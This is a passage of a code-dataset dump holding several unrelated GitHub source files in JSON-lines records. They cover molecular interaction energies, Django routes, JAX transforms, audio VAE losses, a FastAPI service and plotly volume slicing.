(1/(4*pi*indiel))*(atom1.charge * atom2.charge) / interatom_distance # kJ/mol\n return eelec # converts to kJ/mol\n\n\ndef interdomain_interactions(domain1, domain2, frame_number):\n \"\"\"Calculate interactions between domain1 and domain2 present in the given frame\n\n Parameters\n ----------\n domain1: MDAnalysis.core.groups.AtomGroup\n Atoms comprising the first domain\n domain2: MDAnalysis.core.groups.AtomGroup\n Atoms comprising the second domain\n frame_number: int\n Frame number, numbering consistent with the original trajectory (for output)\n\n Returns\n -------\n domain_interactions: list\n List contaning frame number, residue number, electrostatic, van der Waals and total interaction energy. This\n list is subsequently printed to output.\n \"\"\"\n\n possible_neighbors = AtomNeighborSearch(domain2.select_atoms('not resname WAT', updating=True))\n domain_interactions = list()\n calculate_vdw = load_from_config('parameters', 'vdw')[0] == 'True'\n for residue in domain1.residues:\n if residue.resname != 'WAT' and residue.resname != 'SOL':\n neighbor_atoms = possible_neighbors.search(residue.atoms,\n float(load_from_config('parameters', 'cutoff')[0]), level='A')\n eelec = 0\n evdw = 0\n for residue_atom in residue.atoms:\n for neighbor_atom in neighbor_atoms:\n eelec += electrostatic_energy(residue_atom, neighbor_atom, domain1.dimensions)\n if calculate_vdw:\n evdw += vdw_energy(residue_atom, neighbor_atom, domain1.dimensions)\n domain_interactions.append('{:<10d} {:<10d} {:>10.5f} {:>10.5f} {:>10.5f}'.format(\n frame_number, residue.resid, eelec, evdw, eelec+evdw))\n return domain_interactions\n\n\ndef process_frame(domain1, domain2, output, frame_number):\n \"\"\"Calculate interactions for a single frame, sort by residue and print them to output.\n\n Parameters\n ----------\n domain1: MDAnalysis.core.groups.AtomGroup\n Atoms comprising the first domain\n domain2: MDAnalysis.core.groups.AtomGroup\n Atoms comprising the second domain\n output: TextIO\n Filename of the output file\n frame_number: int\n Frame number, numbering consistent with the original trajectory (for output)\n \"\"\"\n\n frame_unsorted = list()\n interactions_domain1 = interdomain_interactions(domain1, domain2, frame_number)\n interactions_domain2 = interdomain_interactions(domain2, domain1, frame_number)\n frame_unsorted += interactions_domain1\n frame_unsorted += interactions_domain2\n for entry in sorted(frame_unsorted, key=lambda row: int(row.split()[1])):\n print(entry, file=output)\n\n\ndef read_uff_parameters():\n \"\"\"Read LJ parameters from the UFF database. Based on Rappe et al., 1992.\n\n Returns\n -------\n parameters: dict\n Dictionary containing LJ parameters for every atom.\n \"\"\"\n\n parameters = {}\n with open(pkg_resources.resource_filename('relictoolkit', 'uff.parm')) as uff_parameters:\n for line in uff_parameters:\n (key, val) = (line.split()[0], line.split()[1:3])\n try:\n val = [float(val[i]) for i in range(0, len(val))]\n parameters[key] = val\n except ValueError:\n pass\n return parameters\n\n\ndef write_logfile_header(settings, logfile):\n \"\"\"Print the calculation start time and given input to the header of the logfile.\n Parameters\n ----------\n settings: ConfigParser\n Object containing data located in config.ini\n logfile: FileIO\n .log file\"\"\"\n\n logfile.write('Calculation started at %s\\n\\n' % datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\"))\n logfile.write('-' * 15 + 'Input overview' + '-' * 15 + '\\n')\n logfile.write('{:<17s}{:<80}\\n'.format('Topology:', settings.get('files', 'topology')))\n trajectory_list = settings.get('files', 'trajectories').split(', ')\n logfile.write('Trajectories:\\n')\n for name in trajectory_list:\n logfile.write('{:<17s}{:<80s}\\n'.format('', name))\n logfile.write('Data written to: %s\\n' % load_from_config('files', 'output')[0])\n logfile.write('Mask1: %s\\nMask2: %s\\n' % (settings.get('parameters', 'mask1'), settings.get('parameters', 'mask2')))\n\n strideinfo = load_from_config('parameters', 'stride')\n if not strideinfo[1]:\n logfile.write('Stride: %s\\n' % int(strideinfo[0]))\n else:\n logfile.write('Stride not specified; a default value of %s used instead\\n'\n % int(strideinfo[0]))\n\n indiinfo = load_from_config('parameters', 'indi')\n if not indiinfo[1]:\n logfile.write('Internal dielectric constant: %s\\n' % indiinfo[0])\n else:\n logfile.write('Internal dielectric constant not specified; using a default value of %s\\n' % indiinfo[0])\n\n vdwinfo = load_from_config('parameters', 'vdw')\n if not vdwinfo[1]:\n if vdwinfo[0]:\n logfile.write('Van der Waals interactions will not be calculated\\n')\n else:\n logfile.write('Van der Waals interactions will be calculated\\n')\n else:\n logfile.write('Treatment of van der Waals interactions not specified; will not calculate\\n')\n\n procinfo = load_from_config('parameters', 'ncores')\n if not procinfo[1]:\n logfile.write('Using %s CPU cores...\\n' % procinfo[0])\n else:\n logfile.write('Number of cores not specified; using %s core\\n' % procinfo[0])\n\n logfile.write('-' * 44 + '\\n\\n')\n\n\ndef tail(f, lines=1, _buffer=4098):\n \"\"\"Tail a file and get X lines from the end\n Taken from:\n https://stackoverflow.com/questions/136168/get-last-n-lines-of-a-file-with-python-similar-to-tail/7047765#7047765\n\n Parameters\n ----------\n f : fileI/O\n file containing the output\n lines : integer\n number of lines to get\n _buffer : integer\n chunk size\n\n Returns\n -------\n Selected number of lines from the end of the file\n \"\"\"\n # place holder for the lines found\n lines_found = []\n\n # block counter will be multiplied by buffer\n # to get the block size from the end\n block_counter = -1\n\n # loop until we find X lines\n while len(lines_found) < lines:\n try:\n f.seek(block_counter * _buffer, os.SEEK_END)\n except IOError: # either file is too small, or too many lines requested\n f.seek(0)\n lines_found = f.readlines()\n break\n\n lines_found = f.readlines()\n\n # we found enough lines, get out\n # Removed this line because it was redundant the while will catch\n # it, I left it for history\n # if len(lines_found) > lines:\n # break\n\n # decrement the block counter to get the\n # next X bytes\n block_counter -= 1\n\n return lines_found[-lines:]\n\n\ndef main():\n pass\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mtomin/relictoolkit","sub_path":"relictoolkit/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":19523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40977811911","text":"# mypy: ignore-errors\n\nfrom typing import Any, Callable\n\nfrom box import Box\n\nfrom hooks import create_context, set_context_value, use_context\n\nStateSelector = Callable[[Any], Any]\nSetTyping = Callable[[StateSelector], None]\nGetTyping = Callable[[], Box]\n\n\nclass ZustandStore:\n def __init__(\n self,\n store_initial_state: dict[str, Any],\n store_config: Callable[[SetTyping, GetTyping], Any],\n ):\n self.state_context = create_context(store_initial_state)\n self.config_context = create_context({})\n\n def setter(state_selector: StateSelector) -> None:\n set_context_value(\n self.state_context,\n state_selector(use_context(self.state_context)),\n )\n\n def getter() -> Box:\n return Box(\n {**use_context(self.state_context), **use_context(self.config_context)}\n )\n\n self.setter = setter\n self.getter = getter\n set_context_value(\n self.config_context,\n store_config(self.setter, self.getter),\n )\n\n def __call__(self, selector: StateSelector) -> Any:\n return selector(self.getter())\n\n\ndef create(\n store_initial_state: dict[str, Any],\n store_config: Callable[[SetTyping, GetTyping], Any],\n) -> ZustandStore:\n \"\"\" \"\"\"\n return ZustandStore(store_initial_state, store_config)\n","repo_name":"amitassaraf/python-hooks","sub_path":"src/hooks/plugins/zustand.py","file_name":"zustand.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"37"} +{"seq_id":"38169882411","text":"import chex\nimport jax.numpy as jnp\nimport jax.random\n\n\ndef x0_centered_to_zero_CoM(x: chex.Array) -> chex.Array:\n n = x.shape[0] + 1\n return x - jnp.sum(x, axis=0, keepdims=True) / n\n\ndef zero_CoM_to_x0_centered(x: chex.Array):\n x0_coordinate = -jnp.sum(x, axis=0, keepdims=True)\n return x - x0_coordinate\n\n\nif __name__ == '__main__':\n key = jax.random.PRNGKey(0)\n n_nodes = 8\n dim = 3\n x_0_centered = jax.random.normal(key, (n_nodes - 1, dim))\n x_zeroCom = x0_centered_to_zero_CoM(x_0_centered)\n x0_in_zeroCom = - jnp.sum(x_zeroCom, axis=0)\n\n x_0_centered_ = zero_CoM_to_x0_centered(x_zeroCom)\n\n chex.assert_trees_all_close(x_0_centered, x_0_centered_, atol=1e-6)\n\n jac = jax.jacfwd(x0_centered_to_zero_CoM)(x_0_centered)\n\n assert (jac[:, 1, :, 0] == 0).all()\n\n A = jnp.eye(n_nodes-1)\n u = 1 / n_nodes * jnp.ones(n_nodes-1)\n v = jnp.ones(n_nodes-1)\n u = u[:, None]\n v = v[:, None]\n expected_jac_dim_0 = A - u @ v.T\n\n\n chex.assert_trees_all_close(expected_jac_dim_0, jac[:, 0, :, 0])\n\n sign, log_det = jnp.linalg.slogdet(jac[:, 0, :, 0])\n\n expected_log_det_dim_0 = - jnp.log(n_nodes)\n\n log_det_ovall = - dim * jnp.log(n_nodes)\n","repo_name":"lollcat/se3-augmented-coupling-flows","sub_path":"eacf/utils/coordinate_transform/atom0centre_to_ZeroCoM_log_det.py","file_name":"atom0centre_to_ZeroCoM_log_det.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"38883765364","text":"from django.conf.urls import url\nfrom django.urls import include, path\n\nfrom .views import *\nfrom django.contrib.auth import views as auth_views\nfrom django.views.decorators.csrf import csrf_exempt\n\nurlpatterns=[\n #url(),\n url(r'^loguear',login,name='login'),\n# url(r'^registrar',registrar_usuario,name='registre'),\n url(r'^pruebas',prueba_html,name='pruebas'),\n url(r'^retornar$',retornar,name='retornar'),\n url(r'^listar_persona$',listar_persona,name='listar_persona'),\n url(r'^crear_personas$',crear_personas,name='crear_personas'),\n url(r'^crear_docentes$',crear_docente,name='crear_docentes'),\n url(r'^cargar_materia',cargar_materias,name='materia'), #como se realza una url\n url(r'^cargar_grado',cargar_grados,name='grado'),\n url(r'^cargar_periodo',cargar_periodo,name='periodo'),\n url(r'^cargar_lectivo', cargar_lectivo, name='lectivo'),\n url(r'^cargar_period_mater', cargar_periodo_materia, name='periodo_materia'),\n url(r'^listar_periodo',listar_periodo, name='list_period'),\n url(r'^listar_grado',listar_grado, name='list_grad'),\n url(r'^listar_materia',listar_materia, name='list_mater'),\n url(r'^listar_lectivo',listar_lectivo, name='list_lectiv'),\n url(r'^listar_period_mater',listar_periodo_materia, name='list_period_mater'),\n url(r'^actualizar_periodo/(?P\\d+)$',periodo_actualizar, name ='actual_period'),\n url(r'^actualizar_lectivo/(?P\\d+)$', lectivo_actualizar, name='actual_lectiv'),\n url(r'^actualizar_grado/(?P\\d+)$',grado_actualizar, name ='actual_grad'),\n url(r'^actualizar_materia/(?P\\d+)$',materia_actualizar, name ='actual_mater'),\n url(r'^actualizar_period_mater/(?P\\d+)$',periodo_materia_actualizar, name ='actual_period_mater'),\n url(r'^eliminar_periodo/(?P\\d+)$',eliminar_periodo, name ='eliminar_period'),\n url(r'^eliminar_lectivo/(?P\\d+)$',eliminar_lectivo, name ='eliminar_lectiv'),\n url(r'^eliminar_materia/(?P\\d+)$',eliminar_materia, name ='eliminar_mater'),\n url(r'^eliminar_grado/(?P\\d+)$',eliminar_grado, name ='eliminar_grad'),\n url(r'^eliminar_period_mater/(?P\\d+)$',eliminar_periodo_materia, name ='eliminar_period_mater')\n]","repo_name":"dany240/regenerar","sub_path":"proyecto_final/materias_demas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71605091627","text":"news_read=open(\"C:\\\\Users\\\\deepa\\\\OneDrive\\\\Desktop\\\\python_works\\\\tokenization\\\\news.txt\",\"r\")\n\nwords_read=open(\"C:\\\\Users\\\\deepa\\\\OneDrive\\\\Desktop\\\\python_works\\\\tokenization\\\\stopwords.txt\",\"r\")\n\nstop_words={line.rstrip(\"\\n\") for line in words_read}\n\nnews_set=set()\n\nfor line in news_read:\n words=line.split(\" \")\n for w in words:\n news_set.add(w)\n\nprint(news_set.difference(stop_words)) \n","repo_name":"deepakdpz/Pythonworks_Luminar","sub_path":"python_works/tokenization/processnews.py","file_name":"processnews.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25595609120","text":"# pile of socks to PAIR by COLOUR\n\n# input:\n# - n: number of socks\n# - ar: array of colours of socks\n\n# task:\n# determine how many pairs of socks with matching colours there are\n\n\ndef sock_merchant(num_of_socks, sock_pile):\n sock_pile = sorted(sock_pile)\n\n i = num_of_pairs = 0\n while i < num_of_socks - 1:\n if sock_pile[i] == sock_pile[i+1]:\n num_of_pairs += 1\n i += 2\n print(i)\n\n else:\n i += 1\n\n return num_of_pairs\n\n\nn = int(input())\narr = map(int, input().strip().split(' '))\n\nprint(sock_merchant(n, arr))\n","repo_name":"ryotokuro/hackerrank","sub_path":"algorithms/sockMerchant.py","file_name":"sockMerchant.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"20375155810","text":"import os\nimport distutils\n\nfrom setuptools import Command\nfrom pkg_resources import normalize_path\nfrom contextlib import contextmanager\n\nfrom .base import CommandMixin, get_easy_install_cmd\nfrom pkglib.egg_cache import get_egg_cache_paths\n\n\n@contextmanager\ndef pip_logging_to_distutils_log():\n # Pip has some non-standard log levels, we'll wire them back into\n # regular logging or they get hidden from the user\n from pip.log import logger\n levels = {\n 'notify': 'info',\n 'debug': 'debug',\n 'info': 'info',\n 'error': 'error',\n 'fatal': 'fatal',\n 'warn': 'warn',\n }\n old_levels = dict((k, getattr(logger, k)) for k in levels.keys())\n for k, v in levels.items():\n setattr(logger, k, getattr(distutils.log, v))\n try:\n yield None\n finally:\n for k, v in old_levels.items():\n setattr(logger, k, v)\n\n\n@contextmanager\ndef patch_UninstallPathSet(egg_caches, install_dir):\n # pip uninstall doesn't realise that you can remove an entry from the virtualenv\n # easy-install.pth file even if the egg itself is outside the virtualenv i.e. in\n # the egg cache. Fix it by adjusting the pth file and entry.\n from pip import req\n ei_pth_file = os.path.join(normalize_path(install_dir), 'easy-install.pth')\n\n class UninstallPathSet(req.UninstallPathSet):\n def _can_uninstall(self):\n return True\n\n def add_pth(self, pth_file, entry):\n if any(pth_file.startswith(egg_cache) for egg_cache in egg_caches):\n pth_file, entry = ei_pth_file, self.dist.location\n super(UninstallPathSet, self).add_pth(pth_file, entry)\n req.UninstallPathSet, old_UninstallPathSet = UninstallPathSet, req.UninstallPathSet\n try:\n yield None\n finally:\n req.UninstallPathSet = old_UninstallPathSet\n\n\nclass pyuninstall(Command, CommandMixin):\n \"\"\" Remove a package. Calls pip.uninstall \"\"\"\n description = \"Remove a package. Uses pip.uninstall\"\n command_consumes_arguments = True\n\n user_options = [\n ('yes', 'y', \"Don't ask for confirmation of uninstall deletions.\"),\n ]\n boolean_options = [\n 'yes',\n ]\n\n def initialize_options(self):\n self.yes = False\n self.args = []\n\n def finalize_options(self):\n pass\n\n def run(self):\n \"\"\" Wire in the pip uninstall command\n \"\"\"\n with pip_logging_to_distutils_log():\n # Lazy imports here to allow pkglib to bootstrap itself.\n from pip import req, exceptions\n\n rs = req.RequirementSet(build_dir=None, src_dir=None, download_dir=None)\n for name in self.args:\n rs.add_requirement(req.InstallRequirement.from_line(name))\n\n install_dir = get_easy_install_cmd(self.distribution).install_dir\n with patch_UninstallPathSet(get_egg_cache_paths(), install_dir):\n try:\n rs.uninstall(auto_confirm=self.yes)\n except exceptions.UninstallationError as e:\n distutils.log.fatal(e)\n","repo_name":"man-group/pkglib","sub_path":"pkglib/pkglib/setuptools/command/pyuninstall.py","file_name":"pyuninstall.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"37"} +{"seq_id":"75224228906","text":"import numpy as np\nfrom scipy.misc import imsave\nfrom os import listdir, makedirs\nfrom os.path import isfile, join\nimport sys, getopt\n\nfrom SALICONtf import SALICONtf\n\n\ndef main(argv):\n img_dir = ''\n out_dir = ''\n\n if argv:\n opts, args = getopt.getopt(argv, \"i:o:w:\")\n else:\n print('Usage: python3 run_SALICON.py -w -i -o ')\n sys.exit(2)\n\n for opt, arg in opts:\n if opt == '-i':\n img_dir = arg\n elif opt == '-o':\n out_dir = arg\n elif opt == '-w':\n model_weights = arg\n\n makedirs(out_dir, exist_ok=True)\n\n images = [f for f in listdir(img_dir) if isfile(join(img_dir, f))]\n\n s = SALICONtf(model_weights)\n\n for img_name in images:\n smap = s.compute_saliency(img_path=join(img_dir, img_name))\n imsave(join(out_dir, img_name), smap)\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"ykotseruba/SALICONtf","sub_path":"src/run_SALICONtf.py","file_name":"run_SALICONtf.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"3616461097","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def isSymmetric(self, root):\n if root == None:\n return True\n queue = collections.deque([(root,root)])\n while (len(queue)>0):\n r1,r2 = queue.popleft()\n if r1.val != r2. val:\n return False\n if r1.left and r2.right:\n queue.append((r1.left,r2.right))\n elif not r1.left and r2.right or r1.left and not r2.right:\n return False\n if r2.left and r1.right:\n queue.append((r1.right,r2.left))\n elif not r1.right and r2.left or r1.right and not r2.left:\n return False\n return True\n \n\n ","repo_name":"quake0day/BugFree","sub_path":"101-Symmetric-Tree/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35211089446","text":"import torch \nfrom torchaudio.transforms import Spectrogram,MelSpectrogram\nimport torch.nn as nn\n\nfrom utils.utilities import safe_log\n\n#################\n# Loss Functions\n#################\n\n#################\n# Waveform VAEs losses\n#################\n\n# Note the below calculates the kl divergence per waveform.\ndef compute_kld(mu, logvar):\n\n mu = torch.flatten(mu, start_dim=1)\n logvar = torch.flatten(logvar, start_dim=1)\n\n kld_loss = torch.mean(-0.5 * torch.sum(1 + logvar - mu ** 2 - logvar.exp(), dim = 1), dim = 0)\n\n return kld_loss\n\nclass spectral_distances(nn.Module):\n def __init__(self,stft_scales=[2048, 1024, 512, 256, 128], mel_scales=[2048, 1024], spec_power=1, mel_dist=True, log_dist=0, sr=16000, device=\"cpu\"):\n super(spectral_distances, self).__init__()\n self.stft_scales = stft_scales\n self.mel_scales = mel_scales\n self.mel_dist = mel_dist\n self.log_dist = log_dist\n T_spec = []\n for scale in stft_scales:\n T_spec.append(Spectrogram(n_fft=scale,hop_length=scale//4,window_fn=torch.hann_window,power=spec_power).to(device))\n self.T_spec = T_spec\n if mel_dist:\n # print(\"\\n*** training with MelSpectrogram distance\")\n T_mel = []\n for scale in mel_scales:\n T_mel.append(MelSpectrogram(n_fft=scale,hop_length=scale//4,window_fn=torch.hann_window,sample_rate=sr,f_min=50.,n_mels=scale//4,power=spec_power).to(device))\n self.T_mel = T_mel\n \n def forward(self,x_inp,x_tar):\n loss = 0\n n_scales = 0\n for i,scale in enumerate(self.stft_scales):\n S_inp,S_tar = self.T_spec[i](x_inp),self.T_spec[i](x_tar)\n stft_dist = (S_inp-S_tar).abs().mean()\n loss = loss+stft_dist\n n_scales += 1\n if self.log_dist>0:\n loss = loss+(safe_log(S_inp)-safe_log(S_tar)).abs().mean()*self.log_dist\n n_scales += self.log_dist\n if self.mel_dist:\n for i,scale in enumerate(self.mel_scales):\n M_inp,M_tar = self.T_mel[i](x_inp),self.T_mel[i](x_tar)\n mel_dist = (M_inp-M_tar).abs().mean()\n loss = loss+mel_dist\n n_scales += 1\n if self.log_dist>0:\n loss = loss+(safe_log(M_inp)-safe_log(M_tar)).abs().mean()*self.log_dist\n n_scales += self.log_dist\n return loss/n_scales\n\ndef envelope_distance(x_inp,x_tar,n_fft=1024,log=True):\n\n # Reshapes, but are these really needed [bs, n_grains, num_samples] --> [bs*n_grains, num_samples]\n x_inp = x_inp.reshape(x_inp.shape[0]*x_inp.shape[1], x_inp.shape[2])\n x_tar = x_tar.reshape(x_tar.shape[0]*x_tar.shape[1], x_tar.shape[2])\n\n env_inp = torch.stft(x_inp, n_fft, hop_length=n_fft//4, onesided=True, return_complex=False)\n env_inp = torch.mean(env_inp[:,:,:,0]**2+env_inp[:,:,:,1]**2,1)\n env_tar = torch.stft(x_tar, n_fft, hop_length=n_fft//4, onesided=True, return_complex=False)\n env_tar = torch.mean(env_tar[:,:,:,0]**2+env_tar[:,:,:,1]**2,1)\n if log:\n env_inp,env_tar = safe_log(env_inp),safe_log(env_tar)\n return (env_inp-env_tar).abs().mean()\n\n############\n# Others\n############\n\ndef calc_reconstruction_loss(target, prediction):\n\n # MSE\n error = target - prediction\n reconstruction_loss = torch.mean(error**2)\n\n return reconstruction_loss\n\n# This calculates the kl divergence \ndef calc_kl_loss(mu, log_variance):\n\n # KL Divergence between predicted gaussian distribution and standard guassian distribution N(0,1)\n kl_loss = - 0.5 * torch.sum(1 + log_variance - torch.square(mu) - torch.exp(log_variance))\n\n return kl_loss\n\n\n\ndef calc_combined_loss(target, prediction, mu, log_variance, reconstruction_loss_weight):\n\n reconstruction_loss = calc_reconstruction_loss(target, prediction)\n kl_loss = calc_kl_loss(mu, log_variance)\n combined_loss = (reconstruction_loss_weight * reconstruction_loss) + kl_loss\n\n return combined_loss, kl_loss, reconstruction_loss\n\ndef compute_losses(self, batch, beta):\n audio,labels = batch\n audio = audio.to(self.device)\n # forward\n audio_output,encoder_outputs = self.forward(audio, sampling=True)\n # compute losses\n spec_loss = self.spec_dist(audio_output,audio)\n if beta>0:\n kld_loss = compute_kld(encoder_outputs[\"mu\"],encoder_outputs[\"logvar\"])*beta\n else:\n kld_loss = 0\n if self.env_dist>0:\n env_loss = envelope_distance(audio_output,audio,n_fft=1024,log=True)*self.env_dist\n else:\n env_loss = 0\n return {\"spec_loss\":spec_loss,\"kld_loss\":kld_loss,\"env_loss\":env_loss}","repo_name":"aaron-dees/neuralGranularSynthesis","sub_path":"models/loss_functions.py","file_name":"loss_functions.py","file_ext":"py","file_size_in_byte":4659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11972986377","text":"from cart.models import Cart\nfrom user.models import MyUser\nfrom newadmin.models import category\nfrom user.models import whishlist\n\ndef carts(request):\n if request.user.is_authenticated:\n cart_items = Cart.objects.filter(username = request.user).count()\n print(cart_items)\n return {'CART_ITEMS':cart_items }\n elif request.session.has_key('guest_user'):\n guest_user = request.session['guest_user']\n cart_items = Cart.objects.filter(guest_token = guest_user).count()\n return{'CART_ITEMS':cart_items}\n\n else:\n return{'CART_ITEMS':0}\n\n\ndef wish_list(request):\n if request.user.is_authenticated:\n whish_items = whishlist.objects.filter(user_name = request.user).count()\n return{'Whish_items': whish_items}\n else:\n return{'Whish_items':0}\n\ndef cat(request):\n cats = category.objects.all()\n return {'cat': cats}\n\n\n","repo_name":"mejokkurian/ecommerce-website","sub_path":"cart/context_processor.py","file_name":"context_processor.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6648231066","text":"from functools import lru_cache\n\nfrom typing import Optional\n\nfrom fastapi import Depends, HTTPException, status\nfrom sqlalchemy import select, text\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom db import get_async_session_app\n\nfrom .base import BaseService\nfrom models import Issue\n\n\nclass IssueService(BaseService):\n\n async def get_all_by_date(self, *args) -> list[Issue]:\n order_attribute, order_direction, created_at = args\n query = select(Issue).where(Issue.created_at.like(f'%{created_at}%'))\n selected_data = (await self.db_session.execute(query)).scalars().all()\n ordered_data = self.get_ordered_data(selected_data, order_attribute, order_direction)\n return ordered_data\n\n async def get_item_by_id(self, pk: int) -> Issue:\n query = select(Issue).where(Issue.id == pk)\n data = (await self.db_session.execute(query)).scalar()\n if not data:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND)\n return data\n\n async def make_comment(self, pk: int, comment: Optional[str]) -> Issue:\n current_issue = await self.get_item_by_id(pk)\n current_issue.comment = comment\n await self.db_session.commit()\n return current_issue\n\n\n@lru_cache\ndef get_issue_service(db_session: AsyncSession = Depends(get_async_session_app)) -> IssueService:\n return IssueService(db_session)\n","repo_name":"EvgeniyBugaiov/vodomat_api","sub_path":"src/services/issue.py","file_name":"issue.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4674612942","text":"from tqdm import tqdm\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nimport os\nimport numpy as np\nimport plotly.graph_objects as go\n\nproperties = {\n \"density\" : {\"cmap\": 'Blues_r', \"pos\": 0, \"vmin\": 20, \"vmax\": 18020},\n \"temp\" : {\"cmap\": 'hot', \"pos\": 1, \"vmin\": 72.16, \"vmax\": 30350},\n \"ab_H2\" : {\"cmap\": 'bone', \"pos\": 8, \"vmin\": 1.76e-14, \"vmax\": 6.911e-05},\n \"ab_H-\": {\"cmap\": 'pink', \"pos\": 7, \"vmin\": 1e-99, \"vmax\":1.629e-07},\n \"ab_H2+\": {\"cmap\": 'copper', \"pos\": 9, \"vmin\": 1e-99, \"vmax\": 1.691e-08}\n }\n\n\ndef GraphCreator(args):\n filereader = open(\"./Multifield/ExtractedCompleteData/\" + args[0], \"r\")\n timestep = args[0].split(\".\")[1]\n prop_name = args[1]\n planeEq = args[2]\n norm_min, norm_max = args[3]\n\n selected_property = []\n\n vmin = 100000007\n vmax = -11111111\n for lines in tqdm(range(0, 600*248*248)):\n d = filereader.readline()\n props = d.split(\" \")\n selected_property.append(float(props[properties[prop_name][\"pos\"]]))\n if(float(props[properties[prop_name][\"pos\"]]) < vmin): vmin = float(props[properties[prop_name][\"pos\"]])\n if(float(props[properties[prop_name][\"pos\"]]) > vmax): vmax = float(props[properties[prop_name][\"pos\"]])\n\n print(vmin, vmax)\n\n #TO perform Axis Aligned slicing -> Extract plane Y=Slicenum. \n #For arbitrary plane, identify the z values that fall on this plane\n #Plane: Ax + By + Cz = D\n #For a given (A,B,C,D),(x,y) we can calculate the y value as:\n # y = (D - Ax - Cz)/B\n # We will colormap according to the values present at (x,y,z)\n\n X_len = 600\n Z_len = 248\n Y_coords = [[0 for i in range(Z_len)] for i in range(X_len)] #shape = (X_len, Z_len)\n X_coords, Z_coords = np.mgrid[0:X_len, 0:Z_len]\n\n val_dict = dict()\n\n frames = []\n\n k_change = planeEq[3]/10\n for kc in range(norm_min, norm_max):\n temp_planeEq = planeEq.copy()\n temp_planeEq[3] += kc*k_change\n\n temp_Y_coords = Y_coords.copy()\n\n for i in range(X_len):\n for j in range(Z_len):\n if(temp_planeEq[1] == 0): \n temp_Y_coords[i][j] = j # Handles parallel to Yaxis condition\n else: \n temp_Y_coords[i][j] = (int)((temp_planeEq[3] - temp_planeEq[0]*i -temp_planeEq[2]*j)/temp_planeEq[1])\n \n #Will store the property values and be used for colormapping\n prop_values = [[0 for i in range(Z_len)] for i in range(X_len)] \n for i in range(X_len):\n for j in range(Z_len):\n if(temp_Y_coords[i][j] < 0 or temp_Y_coords[i][j] >=248):\n prop_values[i][j] = properties[prop_name][\"vmin\"]\n else:\n prop_values[i][j] = selected_property[X_len*Z_len*j + 600*temp_Y_coords[i][j] + i]\n \n val_dict[kc] = dict(coord = temp_Y_coords, value = prop_values)\n \n frame = go.Frame(data = go.Surface(\n x = X_coords,\n y = Z_coords,\n z = val_dict[kc][\"coord\"],\n surfacecolor = val_dict[kc][\"value\"],\n coloraxis='coloraxis',\n cmin = properties[prop_name][\"vmin\"],\n cmax = properties[prop_name][\"vmax\"]\n ),\n name = str(kc))\n frames.append(frame)\n \n fig = go.Figure(frames=frames) \n fig.add_trace(\n go.Surface(\n x = X_coords,\n y = Z_coords,\n z = val_dict[norm_min][\"coord\"],\n surfacecolor = val_dict[norm_min][\"value\"],\n coloraxis='coloraxis',\n cmin = properties[prop_name][\"vmin\"],\n cmax = properties[prop_name][\"vmax\"]\n )\n )\n fig.update_layout(\n title_text = \"Arbitrary Volume Slicing \" + str(planeEq[0]) + \"x + \" + str(planeEq[1]) + \"y +\" + str(planeEq[2]) + \"z = k\" ,\n coloraxis=dict(\n colorscale=properties[prop_name][\"cmap\"],\n )\n )\n \n def frame_args(duration):\n return {\n \"frame\": {\"duration\": duration},\n \"mode\": \"immediate\",\n \"fromcurrent\": True,\n \"transition\": {\"duration\": duration, \"easing\": \"linear\"},\n }\n\n sliders = [\n {\n \"pad\": {\"b\": 10, \"t\": 60},\n \"len\": 0.9,\n \"x\": 0.1,\n \"y\": 0,\n \"steps\": [\n {\n \"args\": [[f.name], frame_args(0)],\n \"label\": str(k+norm_min),\n \"method\": \"animate\",\n }\n for k, f in enumerate(fig.frames)\n ],\n }\n ]\n fig.update_layout(\n scene=dict(\n xaxis = dict(range=[0,600], title=\"X position\"),\n yaxis = dict(range=[0,248], title=\"Z position\"),\n zaxis = dict(range=[0,248], title=\"Y position\")),\n width = 900,\n height = 900,\n updatemenus = [\n {\n \"buttons\": [\n {\n \"args\": [None, frame_args(50)],\n \"label\": \"▶\", # play symbol\n \"method\": \"animate\",\n },\n {\n \"args\": [[None], frame_args(0)],\n \"label\": \"◼\", # pause symbol\n \"method\": \"animate\",\n },\n ],\n \"direction\": \"left\",\n \"pad\": {\"r\": 10, \"t\": 70},\n \"type\": \"buttons\",\n \"x\": 0.1,\n \"y\": 0,\n }\n ],\n sliders=sliders\n )\n fig.show()\n\ndef SliceExtractor(timestep, prop_name, planeEq, minLim, maxLim): \n arguments = []\n tsep = \"\"\n if(timestep < 100): tstep = \"0\" 